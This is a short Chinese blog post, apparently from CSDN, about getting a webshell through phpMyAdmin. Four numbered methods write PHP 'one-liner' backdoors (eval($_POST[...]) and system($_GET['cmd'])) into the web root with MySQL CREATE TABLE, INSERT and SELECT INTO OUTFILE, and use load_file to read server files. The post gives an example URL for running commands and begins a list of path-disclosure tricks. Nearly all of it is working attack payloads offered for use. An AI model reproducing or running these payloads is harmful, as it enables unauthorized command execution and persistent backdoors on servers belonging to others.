phpmyadmin后台

本文介绍了多种利用PHP在数据库中创建、读取和导出文件的方法,如通过CREATE TABLE、INSERT INTO、SELECT INTO OUTFILE等SQL语句。此外,还列举了不同场景下的路径爆破技术,包括通过URL参数、错误信息、配置文件、PHPmyadmin等途径获取服务器路径信息。这些方法展示了如何在合法操作和恶意攻击中使用PHP。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

方法一:
CREATE TABLE mysql.xiaoma (xiaoma1 TEXT NOT NULL );
INSERT INTO mysql.xiaoma (xiaoma1 )VALUES (’<?php @eval($_POST[xiaoma])?>’);
SELECT xiaomaFROM study INTO OUTFILE ‘E:/wamp/www/7.php’;
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
一句话连接密码:xiaoma

方法二:
Create TABLE xiaoma (xiaoma1 text NOT NULL);
Insert INTO xiaoma (xiaoma1) VALUES(’<?php eval($_POST[xiaoma])?>’);
select xiaoma1 from xiaoma into outfile ‘E:/wamp/www/7.php’;
Drop TABLE IF EXISTS xiaoma;

方法三:

读取文件内容: select load_file(‘E:/xamp/www/s.php’);

写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE ‘E:/xamp/www/xiaoma.php’

cmd执行权限:select ‘<?php echo \'

\';system($_GET[\'cmd\']); echo \'
\'; ?>’ INTO OUTFILE ‘E:/xamp/www/xiaoma.php’

方法四:
select load_file(‘E:/xamp/www/xiaoma.php’);

select ‘<?php echo \'

\';system($_GET[\'cmd\']); echo \'
\'; ?>’ INTO OUTFILE ‘E:/xamp/www/xiaoma.php’
然后访问网站目录: http://www.xxxx.com/xiaoma.php?cmd=dir

php爆路径方法收集 :

1、单引号爆路径
说明:
直接在

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值